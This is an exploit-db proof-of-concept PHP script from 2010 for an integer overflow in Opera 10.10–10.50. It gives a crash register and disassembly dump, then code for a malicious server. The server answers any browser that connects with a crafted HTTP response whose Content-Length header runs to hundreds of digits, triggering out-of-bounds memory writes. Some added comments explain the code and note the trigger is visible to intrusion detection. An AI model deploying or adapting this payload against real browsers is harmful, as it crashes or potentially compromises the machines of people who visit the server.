Opera 10.50 – integer Overflow

  • 作者: Marcin Ressel
    日期: 2010-03-03
  • 来源:https://www.exploit-db.com/exploits/11622/
  • <?php
    
    /*
    *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    *-------------------------------------------------------------------------------
    * Opera 10.10 - 10.50 
    * Title: Integer overflow leading to out-of-bounds array access R/W (0day PoC)
    * Author: Marcin Ressel aka ~echo
    * Date: 3.03.2010 
    * Software: http://choice.opera.com/download/get.pl?thanks=true&sub=true&wu=1&wulang=pl&info=1
    * Version: Tested on 10.10, 10.50, but I think other versions are vulnerable too
    * Platform: Windows xp home sp 2 pl
    * Muz: http://totgeliebt.wrzuta.pl/audio/6dXgnLnsI82 (podniecilem sie) 
    * Contact: pokoFac_nerda@tvn24.pl
    *
    * @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    *
    * Exception: Access violation when writing to [01A23000]
    * Registers: EAX 03D89DF2
     ECX 3FFF3ABE
     EDX 00000002
     EBX FFFFFFFF
     ESP 0012F158
     EBP 0012F160
     ESI 03DBB2F8
     EDI 01A23000
     EIP 6781E0BA Opera_12.6781E0BA
    
    * DUMP Function:
    6781E060 55 PUSH EBP
    6781E061 8BEC MOV EBP,ESP
    6781E063 57 PUSH EDI
    6781E064 56 PUSH ESI
    6781E065 8B75 0CMOV ESI,DWORD PTR SS:[EBP+C]
    6781E068 8B4D 10MOV ECX,DWORD PTR SS:[EBP+10]
    6781E06B 8B7D 08MOV EDI,DWORD PTR SS:[EBP+8]
    6781E06E 8BC1 MOV EAX,ECX
    6781E070 8BD1 MOV EDX,ECX
    6781E072 03C6 ADD EAX,ESI
    6781E074 3BFE CMP EDI,ESI
    6781E076 76 08JBE SHORT Opera_12.6781E080
    6781E078 3BF8 CMP EDI,EAX
    6781E07A 0F82 A4010000JB Opera_12.6781E224
    6781E080 81F9 00010000CMP ECX,100
    6781E086 72 1FJB SHORT Opera_12.6781E0A7
    6781E088 833D 882AF167 00 CMP DWORD PTR DS:[67F12A88],0
    6781E08F 74 16JE SHORT Opera_12.6781E0A7
    6781E091 57 PUSH EDI
    6781E092 56 PUSH ESI
    6781E093 83E7 0FAND EDI,0F
    6781E096 83E6 0FAND ESI,0F
    6781E099 3BFE CMP EDI,ESI
    6781E09B 5E POP ESI
    6781E09C 5F POP EDI
    6781E09D 75 08JNZ SHORT Opera_12.6781E0A7
    6781E09F 5E POP ESI
    6781E0A0 5F POP EDI
    6781E0A1 5D POP EBP
    6781E0A2^E9 88CEFFFFJMP Opera_12.6781AF2F
    6781E0A7 F7C7 03000000TEST EDI,3
    6781E0AD 75 15JNZ SHORT Opera_12.6781E0C4
    6781E0AF C1E9 02SHR ECX,2
    6781E0B2 83E2 03AND EDX,3
    6781E0B5 83F9 08CMP ECX,8
    6781E0B8 72 2AJB SHORT Opera_12.6781E0E4
     BUG->6781E0BA F3:A5REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]<-- BUG 
    6781E0BC FF2495 D4E18167JMP DWORD PTR DS:[EDX*4+6781E1D4]
    6781E0C3 90 NOP
    6781E0C4 8BC7 MOV EAX,EDI
    6781E0C6 BA 03000000MOV EDX,3
    6781E0CB 83E9 04SUB ECX,4
    6781E0CE 72 0CJB SHORT Opera_12.6781E0DC
    6781E0D0 83E0 03AND EAX,3
    6781E0D3 03C8 ADD ECX,EAX
    6781E0D5 FF2485 E8E08167JMP DWORD PTR DS:[EAX*4+6781E0E8]
    6781E0DC FF248D E4E18167JMP DWORD PTR DS:[ECX*4+6781E1E4]
    6781E0E3 90 NOP
    6781E0E4 FF248D 68E18167JMP DWORD PTR DS:[ECX*4+6781E168]
    ...
    *---------------------------------------------------------------------------
    * BREAK AT 6781E0BA
    ECX=3FFF3ABE (decimal 1073691326.)
    DS:[ESI]=[03DBB2F8]=00000000
    ES:[EDI]=[01A23000]=???
    *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    *
    */
    // --- Runtime prerequisites -------------------------------------------------
    // Derive an OS label from the OS environment variable (first three chars,
    // case-folded: "win" -> Windows, anything else -> "nix") and make sure the
    // sockets extension is usable, since the listener below relies on socket_*().
    // NOTE(review): $_ENV is only populated when 'E' is part of variables_order;
    // with an empty $_ENV the substr() sees null and this silently becomes 'nix'.
    if(strtolower(substr($_ENV['OS'],0,3)) == "win") define('OS','win');
    else define('OS','nix');
     // NOTE(review): the sockets extension registers under the name 'sockets',
     // so extension_loaded('php_sockets') may report false even when it is
     // loaded -- confirm. If it does, dl() is attempted for the OS-specific
     // library with warnings suppressed (@), and the script aborts on failure.
     if(!extension_loaded('php_sockets'))
     {
    if((OS == 'win') && (!@dl('php_sockets.dll')) ||
    ((OS == 'nix') && (!@dl('php_sockets.so')))) 
    die('fatal php_sockets.[dll/so] '.
    'not loaded '."\r\n");//.__line__.' '.__file__."\r\n");
     } 
    /*Generated by my own fuzzer*/
    $EVIL = 'HTTP/1.1 200 ok'."\r\n".
    'Transfer-Encoding: identity'."\r\n".
    'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n".
    'Server: moj zuy server'."\r\n".
    'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".
    'Content-Location: file://C:/boot.ini'."\r\n".
    'Vary:negotiate,accept-language,accept-charset'."\r\n".
    'Tcn: choice'."\r\n".
    'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n".
    'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".
    'Accept-Ranges: bytes'."\r\n".
    'Cache-Control: max-age=0'."\r\n".
    'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n".
    'Content-Encoding: identity'."\r\n".
    'Content-Length:999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999666'."\r\n".
    'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n".
    'Keep-Alive: timeout=15, max=300'."\r\n".
    'Connection: keep-alive'."\r\n".
    'Content-Type: text/html; charset=iso-8859-2'."\r\n".
    'Age: 1'."\r\n".
    'Allow: GET,HEAD'."\r\n".
    'Content-Disposition: inline'."\r\n".
    'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n".
    'Warning: 199 Miscellaneous warning'."\r\n".
    'Trailer: Max-Forwards'."\r\n".
    'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n".
    'Content-Range: bytes 21010-47021/47022'."\r\n".
    'Content-Language: pl'."\r\n\r\n".
    '<html><head></head><body style="background-color:red;color:white;text-align:center;"><b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>';
    // --- Single-shot listener --------------------------------------------------
    // Command-line handling: $argc/$argv are the CLI argument count and vector.
    // Arguments are scanned as "-port N" pairs (N must cast to a positive int);
    // with no arguments at all the listener falls back to port 81.
    // NOTE(review): if arguments are present but none is "-port <n>", $PORT is
    // never assigned and socket_create_listen() below receives an undefined
    // variable -- confirm whether that is intended.
    $buster = $argc - 1;// - 1;
    if($buster > 0)
    {
    for($i = 1; $i<$buster; $i+=2) 
    if(('-port' == $argv[$i]) && ((int)$argv[$i + 1] > 0)) $PORT = $argv[$i + 1];
    }
    else $PORT = 81;
    // socket_create_listen() binds on all local interfaces, so the canned
    // response is served to any client that can reach this host on $PORT,
    // not only a browser on the same machine.
    if(!($SOCKET = socket_create_listen($PORT)))
     die('fatal socket init failed'."\r\n");
    // 3-second receive timeout set on the listening socket. Whether the socket
    // returned by socket_accept() inherits it is platform-dependent -- TODO
    // confirm on the target platform.
    socket_set_option($SOCKET,SOL_SOCKET,
    SO_RCVTIMEO,array("sec"=>3,"usec"=>0));
    echo('SOCKET READY AT PORT '.$PORT."\r\n".
     'Now connect here via opera'."\r\n"); 
    // Exactly one connection is handled. The first 8 bytes the client sends are
    // read (MSG_WAITALL: block until all 8 arrive) and then discarded -- the
    // request is never parsed, so any URL fetched from this port gets the same
    // answer: the $EVIL response assembled above, an HTTP/1.1 header block whose
    // Content-Length value is hundreds of digits long. That oversized length is
    // the integer-overflow trigger this PoC demonstrates, and it is also the
    // observable a proxy or IDS can flag on the wire.
    if($CONNECT = socket_accept($SOCKET))
    {
    $recv_buffer = null;
    echo('Connection ok '."\r\n");
    if(socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL))
    {
    // A failed socket_write() (warning suppressed with @) tears down both
    // sockets and aborts the script.
    if(!@socket_write($CONNECT,$EVIL))
    {
    socket_close($CONNECT);
    socket_close($SOCKET);
    die('I cant send payload !'."\r\n"); 
    } 
    } 
    else echo('Something wrong with client side'."\r\n");
    // 120 ms pause before closing -- presumably to let the response drain to
    // the client first; the listener then exits after this single connection.
    usleep(120000);
    socket_close($CONNECT);
    socket_close($SOCKET); 
    }
    echo('OK ya browser must be death now'."\r\n".
     'Have a nice day lol'."\r\n"); 
    
    //[2010-03-03 20:47:46]
    //i cut be milion dolar man ;=
    ?>